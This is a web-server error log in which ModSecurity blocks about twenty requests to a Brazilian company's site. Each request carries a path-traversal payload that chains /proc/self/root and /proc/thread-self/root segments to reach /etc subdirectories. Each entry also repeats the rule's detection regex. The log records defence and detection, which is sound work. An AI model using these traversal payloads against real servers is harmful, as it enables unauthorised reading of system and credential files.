[Wed Mar 18 08:38:29.159078 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:59596] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOteyqAr6etmhZHNqntQAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:38:33.301181 2026] [:error] [pid 17653:tid 140411574073088] [client 74.7.243.128:41148] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOucdf6f5d65gmYZS9-gAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:38:35.271577 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.241.31:49996] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOu8df6f5d65gmYZS9_QAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:38:40.383302 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.243.128:41160] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOwAkwaGbbGflqUZD6pQAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:38:41.666985 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.243.128:55030] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOwQkwaGbbGflqUZD6pgAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:38:42.417486 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.241.31:50006] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOwkzinOy1jxa1j4f9PgAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:38:49.267037 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:55036] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOyda6ubjKNq_cu4aCSwAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:38:52.794311 2026] [:error] [pid 11816:tid 140411565680384] [client 74.7.243.128:49026] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOzOw_le52K8_3pV3KWwAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:38:54.204943 2026] [:error] [pid 15051:tid 140411540502272] [client 74.7.243.128:49034] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOzimAPhZkrhU8w4lXIAAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:38:55.543074 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.243.128:49050] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOz-oXxyEfFpUF8f9YlgAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:38:56.875118 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.243.128:49052] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqO0Mdf6f5d65gmYZS-DwAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:39:01.417931 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:49056] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqO1da6ubjKNq_cu4aCTgAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:39:05.399431 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:55670] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqO2da6ubjKNq_cu4aCUgAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:39:06.742256 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.243.128:55680] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqO2tY0UrI5A3LftIyKxAAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:39:08.025143 2026] [:error] [pid 29882:tid 140411557287680] [client 74.7.243.128:55686] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqO3EzinOy1jxa1j4f9fgAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:39:11.405667 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.243.128:55702] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqO3-w_le52K8_3pV3KZgAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:39:12.728567 2026] [:error] [pid 11816:tid 140411733534464] [client 74.7.243.128:40284] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqO4Ow_le52K8_3pV3KZwAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:39:22.781025 2026] [:error] [pid 15051:tid 140411540502272] [client 74.7.243.128:40288] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqO6imAPhZkrhU8w4lXQQAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:39:25.146087 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.243.128:49250] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqO7eyqAr6etmhZHNqn6AAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:39:26.439791 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.243.128:49262] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqO7vu8EFLIOrSqIpvvNAAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:39:28.774105 2026] [:error] [pid 15051:tid 140411741927168] [client 74.7.243.128:49268] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqO8CmAPhZkrhU8w4lXQwAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:39:30.089939 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.243.128:54620] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqO8uoXxyEfFpUF8f9YoAAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
